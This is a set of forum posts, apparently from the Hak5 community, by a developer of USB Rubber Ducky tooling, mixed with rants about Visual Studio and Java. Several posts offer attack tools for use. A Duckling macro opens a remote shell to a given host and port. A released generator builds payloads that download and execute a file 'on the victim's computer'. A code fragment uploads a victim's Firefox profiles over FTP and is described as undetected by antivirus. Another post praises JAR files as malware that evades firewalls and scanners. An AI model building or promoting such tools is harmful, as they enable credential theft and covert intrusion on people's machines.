ApacheTech Consultancy

Update: I've found something wrong with Visual Studio... ...Visual Studio 2012. It's unusable. It's horrible. I hate it. I hope Metro dies soon, and VS2012 dies along with it. I've literally now only just installed it and Microsoft have destroyed the best IDE on the market. It's vile. They destroyed Windows with Windows 8 and now they've destroyed VS with VS2012. Metro is the single worst mistake Microsoft have ever made and I hope it hurts them badly enough for them to ditch the whole stupid, useless and idiotic project. Stay away from VS2012 at all costs until someone can fix this utterly broken, piss-poor excuse for software. *sadface* R.I.P. Visual Studio. You will be sorely and bitterly missed.

Am I right in thinking then that a single line: DELAY 2046 would fill the memory bank?

How many lines depends on the length of the line. You have 2048 bytes. Each character is a byte. Also, DELAY takes up bytespace as well. Also, remember that 2049 bytes won't work, if the file says 2KB, make sure it is exactly 2KB. 2047 bytes will read as 1KB. If, when you put the duck into the PC, NUM_LOCK is enabled, inject.bin will fire. If, when you put the duck into the PC, CAPS_LOCK is enabled, inject2.bin will fire. Take the Duck out and replace it if you want the other script to trigger.

It's probably better to future-proof as early as possible. I'd go with a full rebuild because if there are breaking changes in the latest version, they will affect any subsequent versions as well. Develop it over time though; the firmwares we have out now will suffice for almost all purposes. Any new features that the new Amtel version can bring will be useful and will aid development in the future. We don't want to be stuck with legacy code which hinders development.

Jees, 2KB will be pushing it for most stuff!

To be pedantic; HTML, PHP, JavaScript and CSS are not programming languages. They are scripting languages. Syntactically, VB.NET is probably the easiest programming language to pick up, and (more or less) converts straight to C# when you're ready to learn that. If you're already familiar with the C-style syntax (PHP, JavaScript), maybe go straight for C#. Visual Studio is the best IDE I've ever used; it's massively extensible, extremely friendly for beginners and experts alike. It is miles ahead of every single other IDE I've come across. You can use it for C, C++,C#, VB, VB.NET, F#, Java, Arduino, Python, Perl, PHP, HTML, CSS, JavaScript and more. For web development it comes with it's own dedicated test server with a full debugging platform. There's nothing I can really say bad about it.

Seeming as though Java is supposed to be a OOP-centric language, it is utterly terrible when it comes to handling objects. Some of even the most basic operations are either impossible, only available through reflection (which should be used as a last resort according to programming best practice), or horrendously long-winded and convoluted. There's no such thing as a delegate, or a predicate; their idea of lambda expressions is laughable; you can't even cast between a generic collection and an array of the same type! I've only been programming in Java for a week and already I despise it! I don't mind writing my own helper or wrapper classes, so long as the basic tools are available to use them in an elegant way. Anonymous inner classes are ugly and pale in comparison to anonymous methods and block initialisers. The way they handle properties is ugly as well. I miss simple tools like typeof. Why don't ArrayLists come with a top-level iterator? Why can't overloaded methods have different return types? Why can't you cast between a generic list of a type and an array of the same type? Why can't you declare method signatures as types? Grr! Silly Java! *launches Visual Studio and breathes a sigh of relief* Don't worry VS, I'll never leave you. I missed you so much!

Java might be the way to go with malicious payloads tbh. They're rarely blacklisted by corporate firewalls; they're not on the standard executable blacklist; they're not included in any real-time scanning of exectutables by AV; they have their own manifests in them to elevate authorisation; they are cross platform; they're archives in their own right so can be used as "trojan" zip files; they're modular and can replicate on command; they download their own dependecies. Theoretically, because a car's onboard computer runs off Java; if you have a new car with a USB port on the dash, you could create a JAR attack to reset your milometer; or as a security device which totally bricks the car overnight, then flashes the ROM when you want to drive away in the morning.

If you want to run a cross-platform program, it would be best written as a Java JAR file. Then, all your worried about is do they have Java installed. But, even then, the execution of that file will be different on each OS. cmd vs. term vs. whatever it is for mac (???) etc. At the moment, there's not a firmware which can detect the OS and run a script based on that detection. Until then, you're best off directing each script towards a specific OS.

Is it possible, with the firmware, to read from a compressed file and expand it into memory? Thinking of which, how would one start developing firmware?

So, you didn't have script.txt in the same directory as encoder.jar? You do need to fully qualify the path to the input file; there's no "default" input file at this time. If using duckling macros, you don't need to have the .txt script in the ducklings subdirectory, it will work from any directory, so long as it's qualified (absolute or relative). The ducklings are imported with an "all or nothing" approach. if they're not imported properly, the program will exit with an error.

The USB Mass Storage Device firmware does not have the HID stuff in it, the triggers are only activated when the device is first inserts. Pressing NUM_LOCK will have no affect when it comes to chain-loading scripts, so far as I know. As mentioned everything is explained, in detail on the wiki.

I didn't think Konboot ever worked on Windows 7, regardless of architecture. I've never seen it work anyway.

Try running it through the Duck Encoder v2.4, available in the stickies. If it works on that then please give feedback. The new release has been greatly altered since that one, it would be good to know if I've broken anything. Can you post the actual text file you are trying to encode? Can you also please run the faulty code in debug mode and post the resulting stack trace? A screenshot will suffice if you can't cut and paste. java -jar encoder.jar -i script.txt --debug

What is a Duckling? New to Duck Encoder v3.0.0, Ducklings are JAR files full of stored procedures or macros which can make writing DuckyScripts a lot easier and more streamlined. They are housed within the "ducklings" sub-directory, wherever your encoder is installed. Ducklings use a similar syntax to regular DuckyScript, but introduce a new prefixed namespace for each Duckling: NAMESPACE::COMMAND arguments The namespace for each duckling will be described within its documentation, and can be found be executing the .duckling.jar file. This will also list all the syntax available within the duckling, as well as details about the author, version and so forth. java -jar SamplePack.duckling.jar Ducklings are currently in open beta until we gain enough feedback to confirm they are stable. Please help us with this task and send us your feedback. So, how do they work? Ducklings work by resolving a single line entry into a multi-line script snippet, inline with where it needs to be in the code. It is possible to use multiple ducklings within the same script, it is even possible to nest duckling macros inside each other, so long as all dependency files are available when the script is encoded. The main limitation is that the REPEAT command will merely repeat the last line of the stored procedure, not the macro itself. This will hopefully be resolved in a later version, once the Ducklings are known to be fully stable. Within the SamplePack.duckling.jar included within the v3.0.0 release of the encoder, there is a single macro called "HELLOWORLD", and the namespace for the Duckling is "SAMPLE". To use this within a script, we use the new namespacing syntax: SAMPLE::HELLOWORLD It Works! :D This is then translated, inline, into the following script when it is encoded: STRING Hello World! STRING You Wrote: It Works! :D Obviously, this is only a very basic example, but pretty much any payload can be stored within a duckling and executed using a single line. Example: REM Runs a Remote Shell to 192.168.1.7 on port 2600. WINNET::RSHELL host 192.168.1.7 sap 2600 How do I create my own Duckling? The source code for the ducklings is available here: Zip: http://ducky-decode.googlecode.com/files/SamplePack.duckling.zip (7ac17bc509334fb92b8f5b8e193a9b822b7b31ca) Svn: http://code.google.com/p/ducky-decode/source/browse/#svn/trunk/Ducklings/v1/SamplePack.duckling A basic knowledge of Java (or at least C-style syntax) is needed until a generator is developed. The source code is relatively self-explanatory, I created the ducklings from scratch after only four days of ever coding in Java, so it's not overly complicated at all. The only files we're interested in are the Duckling.java file and the Main.java. Duckling.java: First, we need to set the namespace for the duckling: /** * TODO: Set the namespace for the duckling. */ private String mNamespace = "WINNET"; Then, declare a new macro and add it to the macro list. The arguments ([host-ip] and [port-number]) are put in place using the standard Java %s string substitution method. Make sure your arguments go in order of where your %s placeholders are within the script. Within the initialiser, the arguments are only for the documentation, but their order is vitally important. As the ducklings develop, more features will be added, but due to their structure and the development process they will go though, I'm afraid we cannot guarantee any backwards compatibility between subversions of the duckling source. Main.java: Here, all we need to change is the personal information about the duckling. private static String Title = "Windows Network and Internet Tools"; private static String Version = "1.0.0.a"; private static String Author = "Apache - ApacheTech Consultancy"; Then just export the project as a runnable JAR file (the procedure differs on various IDEs) and you're done. Again, please let us know your feedback and any suggestions you may have for development. Developer Info: Duckling Development Stage: Open Beta Duckling Factory Development Stage: Pre-Alpha

I use the TwinDuck v2.1 firmware at the moment. While I'm developing, it's nice to have the Pen Drive access so I'm not constantly swapping drives. Just load a new inject.bin and press the button. I'm waiting for the MultiDuck firmware to come out, I'd like the TwinDuck and MultiplePayloadDuck firmwares to be combined, giving UMD access and four possible scripts to run. Any v2+ firmware is compatible with the latest hardware. You may find difficulty running some of the latest scripts on the v1 and stock. There's a noted speed increase as well with the v2 over the v1 when running it as a USB Pen Drive.

There's a sticky thread (http://forums.hak5.org/index.php?/topic/28254-tutorial-re-flashingupgrading-the-ducky-winxp-32bit/) that tells you everything you need to know about this. It includes a link to the dev site to download (and view information about) the various firmwares. Firmware to Support HID on Windows, Linux, Mac OS X, Android & IOS Firmware to Support Mass Storage (acts like USB Drive) Firmware to Support Multiple Payloads in HID mode (Triggers via Keyboard LEDs) Firmware Composite Device; Mass Storage & Keyboard,Language Independent

I ended up using 0MQ (http://zguide.zeromq.org/page:all), which makes it wonderfully easy to create various forms of message queues. I'm using the Pub/Sub pattern over TCP on port 2600. ZMQ.Context context = new ZMQ.Context(1); ZMQ.Socket publisher = context.Socket(ZMQ.SocketType.PUB); publisher.Bind("tcp:\\*:2600"); \\ Or publisher.Bind(ZMQ.Transport.TCP, "*", 2600); publisher.Send("Hello World!", Encoding.Unicode); The library works in the following languages: It's one of the most versatile libraries I've ever seen. :D

The step by step instruction guide is easy to follow. Not idiot proof, but it's a good guide. I'd never done anything like it before and it worked first time. So far as I know, it's nigh on impossible to brick the duck. So long as you follow the guide to the letter, you should be fine. Read the guide first, download all the gear you need and set it all up ready to go. If you feel even semi confident about it, go for it. We're here to assist if you need, but trying it for yourself first will greatly increase your confidence and competence with the hardware itself.

The TwinDuck firmware allows you to use the Duck as a Mass Storage Device, as well as a HID. There is a step by step guide to flashing your duck with the new firmware in the Stickies on the forum. Which duck are you using currently, i.e. what colour is the board? This will give us an indication of which stock firmware you are currently using. It is possible that commands which have either been added or depreciated are causing errors with your compiler. If you use the TwinDuck Firmware, make sure you use the latest versions of the compiler and make sure your Java files are up to date (or at least Java 1.7.0). This will give you the best chance of completion.

With the community we have on this forum as a whole, having a separate dedicated site is fairly redundant. I suppose there is also a lot more foot traffic through here that wouldn't have otherwise gone to a dedicated site.

That's not what this release is designed for. This is designed to download a file straight from the internet and execute it on the victim's computer. The script it's based on is here: http://forums.hak5.org/index.php?/topic/25177-payload-powershell-downloadexecute/#entry193195

Version: 1.0.0.0 (Initial Release). Architecture: Windows 32bit (should work on 64bit, but untested). Usage: Enter URL of the executable file, click generate and choose the output folder. Output: inject.bin payload file, in a chosen directory. Written By: Apache Copyright: ApacheTech Consultancy, 2013. License: OPEN SOURCE FREEWARE. Permission granted for reproduction. Please give credit where credit is due. Acknowledgements: George Cost: http://www.4shared.com/u/VMsAhm-b/whoknows.html Un4seen: http://www.un4seen.com/ Mubix: http://forums.hak5.org/index.php?/topic/25177-payload-powershell-downloadexecute/#entry193195 Alex Aza: http://stackoverflow.com/questions/6317457/error-while-reading-embedded-resource-into-byte-array-c/6317469#6317469 HashInfo: # MD5 checksums generated by MD5summer (http://www.md5summer.org) # Generated 01/03/2013 15:02:13 ba2bfd8b5f53a44b86e6fe540ac4c89e *WgetAndExecuteScriptGenerator.rar Download (Source and Binaries): WgetAndExecuteScriptGenerator.rar

Well, I'm an undergrad student who is looking for a final year project for my degree. :p I have no real background in firmware though, or C.

The FTP Wrapper class I'm using is here: http://netftp.codeplex.com/releases/view/95632 The main bulk of the program is written using Extension Methods. These are the main ones. Please excuse the lack of annotation. Then, just a very simple controller class for the victim. And finally, the file lists themselves: Once you have all that, it's relatively self explanatory what goes where. FFE.FullProfilesList.ForEach((p) => p.Upload("Firefox", Victim.FirefoxProfiles)); It's fully undetected on all of the online av scraper sites I've tried.